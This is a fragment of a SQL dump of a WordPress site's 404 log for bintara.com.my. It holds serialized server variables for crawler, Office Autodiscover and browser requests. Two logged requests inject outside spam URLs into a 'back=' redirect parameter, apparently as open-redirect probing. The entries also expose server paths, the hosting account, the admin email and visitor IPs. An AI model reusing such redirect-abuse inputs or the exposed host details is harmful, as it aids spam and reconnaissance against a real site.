"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaI3kYk2xAl72-AvyeeaoQAAAlM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570912145.8974\";s:12:\"REQUEST_TIME\";s:10:\"1570912145\";}}','notice','2019-10-12 20:29:09','2019-10-12 20:29:06',35464568,37273344,'https://bintara.com.my/?page_id=18',1,0,'45.120.51.130'),(27945,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/information-security/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:195:\"Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/information-security/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaI7UV1Z8dvWoyK@EqPEqgAAAYk\";s:12:\"REDIRECT_URL\";s:22:\"/information-security/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.116\";s:11:\"REMOTE_PORT\";s:5:\"22583\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/information-security/\";s:10:\"SCRIPT_URL\";s:22:\"/information-security/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaI7UV1Z8dvWoyK@EqPEqgAAAYk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570913105.5706\";s:12:\"REQUEST_TIME\";s:10:\"1570913105\";}}','notice','2019-10-12 20:45:08','2019-10-12 20:45:05',34319112,36123472,'https://bintara.com.my/information-security/',1,0,'207.46.13.116'),(27946,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:24:\"/?page_id=18/contact.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:105:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.9) Gecko/20100101 Goanna/3.4 Firefox/52.9 PaleMoon/27.9.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:22:\"page_id=18/contact.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"162.248.4.8\";s:11:\"REMOTE_PORT\";s:5:\"45564\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaJFSlpVsBpodkjD2Ra8kQAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570915658.7551\";s:12:\"REQUEST_TIME\";s:10:\"1570915658\";}}','notice','2019-10-12 21:27:41','2019-10-12 21:27:39',35418200,37229168,'https://bintara.com.my/?page_id=18/contact.php',1,0,'162.248.4.8'),(27947,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:143:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2FAstronautdan.net%2Fdoku.php%3Fid%3Dprofile_julienneschaw&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3428.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:141:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2FAstronautdan.net%2Fdoku.php%3Fid%3Dprofile_julienneschaw&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"107.175.153.230\";s:11:\"REMOTE_PORT\";s:5:\"58585\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaJzYF1Z8dvWoyK@EqPPDQAAAYs\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570927456.5565\";s:12:\"REQUEST_TIME\";s:10:\"1570927456\";}}','notice','2019-10-13 00:44:19','2019-10-13 00:44:16',35473224,37279096,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2FAstronautdan.net%2Fdoku.php%3Fid%3Dprofile_julienneschaw&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'107.175.153.230'),(27948,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3428.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"107.175.153.230\";s:11:\"REMOTE_PORT\";s:5:\"49083\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaJzaQkNfFWjTvvon1oDcgAAAUQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570927465.8634\";s:12:\"REQUEST_TIME\";s:10:\"1570927465\";}}','notice','2019-10-13 00:44:27','2019-10-13 00:44:26',35035024,36845832,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'107.175.153.230'),(27949,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/toughpad-fz-g1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/toughpad-fz-g1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/toughpad-fz-g1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaJ8T11Z8dvWoyK@EqPSzQAAAY0\";s:12:\"REDIRECT_URL\";s:16:\"/toughpad-fz-g1/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.247\";s:11:\"REMOTE_PORT\";s:4:\"8129\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/toughpad-fz-g1/\";s:10:\"SCRIPT_URL\";s:16:\"/toughpad-fz-g1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaJ8T11Z8dvWoyK@EqPSzQAAAY0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570929743.5449\";s:12:\"REQUEST_TIME\";s:10:\"1570929743\";}}','notice','2019-10-13 01:22:26','2019-10-13 01:22:23',34317048,36115544,'https://bintara.com.my/toughpad-fz-g1/',1,0,'207.46.13.247'),(27950,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:34:\"https://bintara.com.my/?page_id=11\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"91.236.74.18\";s:11:\"REMOTE_PORT\";s:5:\"52682\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaJ@HlpVsBpodkjD2RbA9QAAANE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570930206.9673\";s:12:\"REQUEST_TIME\";s:10:\"1570930206\";}}','notice','2019-10-13 01:30:09','2019-10-13 01:30:07',35418296,37215976,'https://bintara.com.my/?page_id=11',1,0,'91.236.74.18'),(27951,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:77:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"01912C89-F85D-4734-90E1-51A9A2CA07E0\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaKLMgkNfFWjTvvon1oHVgAAAU0\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"183.171.185.102\";s:11:\"REMOTE_PORT\";s:5:\"50270\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaKLMgkNfFWjTvvon1oHVgAAAU0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570933554.2467\";s:12:\"REQUEST_TIME\";s:10:\"1570933554\";}}','notice','2019-10-13 02:25:56','2019-10-13 02:25:54',35735608,37533288,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.185.102'),(27952,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"B09679AE-268D-4B02-B24E-755AC2BE15F3\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaKjW1pVsBpodkjD2RbFowAAAMo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"175.145.180.231\";s:11:\"REMOTE_PORT\";s:5:\"35727\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaKjW1pVsBpodkjD2RbFowAAAMo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570939739.7296\";s:12:\"REQUEST_TIME\";s:10:\"1570939739\";}}','notice','2019-10-13 04:09:02','2019-10-13 04:09:00',35840688,37645096,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'175.145.180.231'),(27953,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft PowerPoint 16.0.4639; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"3\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.0.4639\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaKxgQkNfFWjTvvon1oQQAAAAVU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"49.50.237.136\";s:11:\"REMOTE_PORT\";s:5:\"42009\";s: